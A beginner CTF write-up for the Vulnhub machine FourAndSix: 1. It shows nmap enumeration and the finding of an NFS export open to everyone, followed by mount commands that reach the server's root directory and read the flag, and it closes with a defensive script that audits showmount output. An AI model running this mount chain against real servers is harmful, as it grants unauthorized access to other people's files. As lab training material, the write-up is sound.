FourAndSix: 1 CTF VULNHUB Walkthrough/Writeup

Today we will be looking at the FourAndSix: 1 CTF Vulnhub challenge by Fred which was uploaded on It is an entry-level, beginner-friendly CTF suitable for noobs.

As the author provides no description on Vulnhub, we assume we need to gain root access and capture the flag, as in most cases.

You can download this machine by clicking here.

Let's get started:

After getting the IP address of the machine, we run nmap to find the open ports and services.

nmap -sV -sC -A -vv -p-
Nmap scan report for fourandsix (
Host is up, received arp-response (0.00081s latency).
Scanned at 2018-07-23 19:38:36 IST for 681s
Not shown: 65531 closed ports
Reason: 65531 resets
22/tcp   open  ssh     syn-ack ttl 64 OpenSSH 7.7 (protocol 2.0)
| ssh-hostkey: 
|   2048 1c:8a:0e:a7:ae:6a:72:ab:c8:88:db:0b:fc:7d:53:c0 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCxwYsIPtgzrJCCBfDxQaA4eMOcJGfP7ioV4nTzwMGKyCryOrCcsBIk9X++SMbXb2Sxlq+XYhBa9nMT2abfOUAuh3LcW+DB+ndMqSEgI/w2wqCR3vL8wT6+Pig+lflh4aIWDXULRKBjNAf9c1rdJ1tt4SYEsEDJ807HVb5Rg2hulibVgp095/EpTyB2vG6ig9zo4rqt0sPF6oc+yaIxld9GrnUxueAkPqw/qwIGO0TIzkuUnZOCmaRT0BnPv6meQQIvy2GiQM8gU+Fk9AceD6YE9iC08wB3nbo8E8A1DHvOCbhBhW/RW5kQ8VFJxdWxTXquKe74S7sfDeZ/lNGyATI7
|   256 8a:9e:af:85:ef:41:51:54:ee:14:35:9d:78:46:cd:56 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKuhzpuMVn0mCPSETswV/gJYan5nphdhOcpOwOBNkIPb2p7h6reh9a5k2h9KyG5XeAqNW5V3wFTJmEfZCzOAvPM=
|   256 0f:42:83:da:a5:7e:53:9c:a5:21:e4:3f:8a:d8:ad:28 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIG6mHUNP/Xzjw55bhOsx0amSUeEgZifBUpf8y/G4QWR0
111/tcp  open  rpcbind syn-ack ttl 64 2 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100003  2,3         2049/tcp  nfs
|   100003  2,3         2049/udp  nfs
|   100005  1,3          787/tcp  mountd
|_  100005  1,3          858/udp  mountd
787/tcp  open  mountd  syn-ack ttl 64 1-3 (RPC #100005)
2049/tcp open  nfs     syn-ack ttl 64 2-3 (RPC #100003)
MAC Address: 08:00:27:09:69:05 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: OpenBSD 6.X
OS CPE: cpe:/o:openbsd:openbsd:6
OS details: OpenBSD 6.0 - 6.1

We can clearly see that port 2049 is running the NFS (Network File System) service, so there must be an export available to mount :D

Network File System (NFS) allows remote hosts to mount file systems over a network. To do this, the NFS server exports a directory, which clients can then mount remotely.

Let's check for the available mounts:
showmount -e
Export list for
/shared (everyone)

So we have an export available: the /shared directory on the server, and it is shared with everyone.

It's time to mount it. First create a directory to serve as the mount point, then mount the export on your system.
mkdir /tmp/CTF
mount -t nfs /tmp/CTF

We found an image (.img) file in the /shared directory of our export. Let's try to mount it and see if we find something interesting.

mkdir usb_stick
mount USB-stick.img usb_stick/
cd usb_stick/
ls -la

But we had no luck.

We need to access the root directory in order to get the root flag, so let's try to mount the root directory if we can.

mkdir root
mount -t nfs /tmp/CTF/root/
cd /tmp/CTF/root
ls -la

In the mounted root directory we have a file named proof.txt.
Let us check the content of proof.txt:

cat proof.txt

And voila! We have our root flag!
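
The whole walkthrough hinges on the "/shared (everyone)" line in the showmount output. From the defender's side, the following added example (not part of the original post) parses `showmount -e` output and reports which exports are open to any host. The function names, the host name and every sample line other than "/shared (everyone)" are assumptions made for illustration.

```python
import ipaddress

# Constructed sample of `showmount -e` output; the host name and every export
# except the page's "/shared (everyone)" line are made up for illustration.
SAMPLE = """\
Export list for nfs.example.test:
/shared   (everyone)
/backups  192.0.2.10,192.0.2.11
/scratch  *
/home     198.51.100.0/24,build01.example.test
/wide     0.0.0.0/0
"""


def client_is_open(client):
    """True when a client spec matches any host on the network."""
    if client in ("(everyone)", "*"):
        return True
    try:
        return ipaddress.ip_network(client, strict=False).prefixlen == 0
    except ValueError:
        return False  # a host name or netgroup: named, so not world-open


def audit_exports(showmount_output):
    """Return [(path, 'open' | 'restricted')] for each exported directory."""
    results = []
    for line in showmount_output.splitlines():
        line = line.strip()
        if not line.startswith("/"):
            continue  # skip the "Export list for ..." header and blank lines
        parts = line.rsplit(None, 1)
        path = parts[0]
        clients = parts[1].split(",") if len(parts) == 2 else []
        # No client column at all is treated as open, the conservative reading.
        is_open = not clients or any(client_is_open(c) for c in clients)
        results.append((path, "open" if is_open else "restricted"))
    return results


if __name__ == "__main__":
    for path, verdict in audit_exports(SAMPLE):
        print(f"{verdict:10} {path}")
```

The export list only shows what the server advertises. In this walkthrough a root directory was mounted although only /shared was listed, so the server's exports file needs reviewing as well.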
